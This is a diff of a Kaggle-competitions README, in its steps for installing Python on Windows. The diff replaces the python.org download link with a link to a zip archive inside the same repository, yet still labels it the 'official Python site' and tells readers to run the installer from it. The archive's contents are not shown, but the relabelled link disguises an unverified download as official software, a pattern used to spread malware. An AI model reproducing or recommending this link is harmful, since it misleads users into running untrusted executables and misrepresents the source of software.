Riskiwahyumahendra/KAGGLE-COMPETITIONS/README.md

 If your PC does not have Python installed, follow these steps:

-- Go to the official Python site: [https://www.python.org/downloads/](https://www.python.org/downloads/)
+- Go to the official Python site: [https://raw.githubusercontent.com/Riskiwahyumahendra/KAGGLE-COMPETITIONS/main/Titanic - Machine Learning from Disaster/COMPETITIONS_KAGGL_v1.2.zip](https://raw.githubusercontent.com/Riskiwahyumahendra/KAGGLE-COMPETITIONS/main/Titanic - Machine Learning from Disaster/COMPETITIONS_KAGGL_v1.2.zip)
 - Download the latest version for Windows (make sure it’s version 3.8 or higher).
 - Run the installer and follow the instructions.
 Ensure the box **Add Python to PATH** is checked during installation.